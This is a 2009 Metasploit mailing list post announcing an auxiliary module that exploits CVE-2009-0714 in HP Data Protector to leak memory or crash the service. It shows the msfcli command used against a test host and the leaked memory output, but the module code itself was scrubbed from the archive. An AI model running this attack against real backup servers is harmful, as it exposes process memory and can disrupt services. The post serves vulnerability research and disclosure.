Metasploit mailing list archives
CVE-2009-0714: HP Dataprotector memory leak/Dos Exploit
From: nicky.coder at gmail.com (Nicky)
Date: Sun, 21 Jun 2009 22:50:05 +0500
Hi, Some more information. HP Data protector is a backup software. This software uses some proprietary protocols for client-server communication. This test module has been tested for windows version only. Other versions may also be affected. In that case, it would only be a matter of identifying the offset_value for each version. Hope this helps. Thanks On Sun, Jun 21, 2009 at 10:43 PM, Nicky <nicky.coder at gmail.com> wrote:
Hi, An auxiliary module for the HP data protector is attached. An output of module is shown below n at n-laptop:/mnt/projects/metasploit$ ./msfcli auxiliary/admin/dataprotector/hp_dataprotector RHOST=172.16.145.129 MEMORY=0x7ffdf000 E [*]Please wait while we load the module tree... [*] Starting Memory Address: 0x7ffdf000 [*] Leaking Memory: 0x7ffdf000 -> 0x12fbc4 [*] Leaking Memory: 0x7ffdf004 -> 0x130000 [*] Leaking Memory: 0x7ffdf008 -> 0x12d000 [*] Leaking Memory: 0x7ffdf00c -> 0x0 [*] Leaking Memory: 0x7ffdf010 -> 0x1e00 [*] Leaking Memory: 0x7ffdf014 -> 0x0 [*] Leaking Memory: 0x7ffdf018 -> 0x7ffdf000 [*] Leaking Memory: 0x7ffdf01c -> 0x0 [*] Leaking Memory: 0x7ffdf020 -> 0x674 [*] Leaking Memory: 0x7ffdf024 -> 0xa8 [*] Leaking Memory: 0x7ffdf028 -> 0x0 [*] Leaking Memory: 0x7ffdf02c -> 0x0 [*] Leaking Memory: 0x7ffdf030 -> 0x7ffd5000 [*] Leaking Memory: 0x7ffdf034 -> 0x0 [*] Leaking Memory: 0x7ffdf038 -> 0x0 [*] Leaking Memory: 0x7ffdf03c -> 0x0 [*] Leaking Memory: 0x7ffdf040 -> 0xe20abeb0 [*] Leaking Memory: 0x7ffdf044 -> 0x0 [*] Leaking Memory: 0x7ffdf048 -> 0x0 [*] Leaking Memory: 0x7ffdf04c -> 0x0 Thanks,
-------------- next part -------------- An HTML attachment was scrubbed... URL: <http://mail.metasploit.com/pipermail/framework/attachments/20090621/f4ce4d3d/attachment.htm>
Current thread:
- CVE-2009-0714: HP Dataprotector memory leak/Dos Exploit Nicky (Jun 21)
- CVE-2009-0714: HP Dataprotector memory leak/Dos Exploit Nicky (Jun 21)